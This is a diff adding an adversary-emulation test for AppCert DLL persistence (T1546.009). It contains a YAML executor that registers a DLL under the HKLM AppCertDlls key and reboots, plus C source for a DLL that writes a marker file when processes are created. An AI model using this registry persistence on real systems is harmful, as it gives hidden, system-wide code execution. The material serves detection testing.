diff --git a/atomics/T1546.009/T1546.009.yaml b/atomics/T1546.009/T1546.009.yaml new file mode 100644 index 00000000..3562899d --- /dev/null +++ b/atomics/T1546.009/T1546.009.yaml @@ -0,0 +1,24 @@ +attack_technique: T1546.009 +display_name: 'Event Triggered Execution: AppCert DLLs' +atomic_tests: +- name: Create registry persistence via AppCert DLL + description: | + Creates a new 'AtomicTest' value pointing to an AppCert DLL in the AppCertDlls registry key. + Once the computer restarted, the DLL will be loaded in multiple processes and write an + 'AtomicTest.txt' file in C:\Users\Public\ to validate that the DLL executed succesfully. + + Reference: https://skanthak.homepage.t-online.de/appcert.html + + supported_platforms: + - windows + executor: + command: | + Copy-Item $PathToAtomicsFolder\T1546.009\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll -Force + reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCertDlls" /v "AtomicTest" /t REG_EXPAND_SZ /d "C:\Users\Public\AtomicTest.dll" /f + Restart-Computer + cleanup_command: | + reg delete "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCertDlls" /v "AtomicTest" /f + Remove-Item C:\Users\Public\AtomicTest.dll -Force + Remove-Item C:\Users\Public\AtomicTest.txt -Force + name: powershell + elevation_required: true diff --git a/atomics/T1546.009/bin/AtomicTest.dll b/atomics/T1546.009/bin/AtomicTest.dll new file mode 100644 index 00000000..e0370e96 Binary files /dev/null and b/atomics/T1546.009/bin/AtomicTest.dll differ diff --git a/atomics/T1546.009/src/AtomicTest.c b/atomics/T1546.009/src/AtomicTest.c new file mode 100644 index 00000000..665494de --- /dev/null +++ b/atomics/T1546.009/src/AtomicTest.c @@ -0,0 +1,52 @@ +/* + Atomic Test T1546.009 + + Author: traceflow (Twitter: @traceflow_ Email: traceflow@0x8d.cc) + https://github.com/tr4cefl0w + + Credits: https://skanthak.homepage.t-online.de/appcert.html +*/ + + +#include +#include + +#pragma comment(lib, "user32") + +typedef enum _REASON +{ + PROCESS_CREATION_QUERY = 1, + PROCESS_CREATION_ALLOWED = 2, + PROCESS_CREATION_DENIED = 3 +} REASON; + +LPCWSTR target = L"C:\\Windows\\System32\\cmd.exe"; + +void Run(LPCWSTR lpApplicationName) { + CreateFile("C:\\Users\\Public\\AtomicTest.txt", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); + return; +} + +NTSTATUS NTAPI CreateProcessNotify(LPCWSTR lpApplicationName, REASON enReason) { + NTSTATUS ntStatus = 0x00000000; // STATUS_SUCCESS + + int result = lstrcmpiW(target, lpApplicationName); + if(result) { + Run(lpApplicationName); + } + return ntStatus; +} + +BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReversed) { + switch ( fdwReason ) { + case DLL_PROCESS_ATTACH: + break; + case DLL_THREAD_ATTACH: + break; + case DLL_THREAD_DETACH: + break; + case DLL_PROCESS_DETACH: + break; + } + return TRUE; +} \ No newline at end of file diff --git a/atomics/T1546.009/src/AtomicTest.def b/atomics/T1546.009/src/AtomicTest.def new file mode 100644 index 00000000..82f9bb08 --- /dev/null +++ b/atomics/T1546.009/src/AtomicTest.def @@ -0,0 +1,2 @@ +EXPORTS + CreateProcessNotify \ No newline at end of file diff --git a/atomics/T1546.009/src/build.bat b/atomics/T1546.009/src/build.bat new file mode 100644 index 00000000..e87c0a8c --- /dev/null +++ b/atomics/T1546.009/src/build.bat @@ -0,0 +1 @@ +cl.exe /W0 /D_USRDLL /D_WINDLL AtomicTest.c AtomicTest.def /MT /link /DLL /OUT:AtomicTest.dll \ No newline at end of file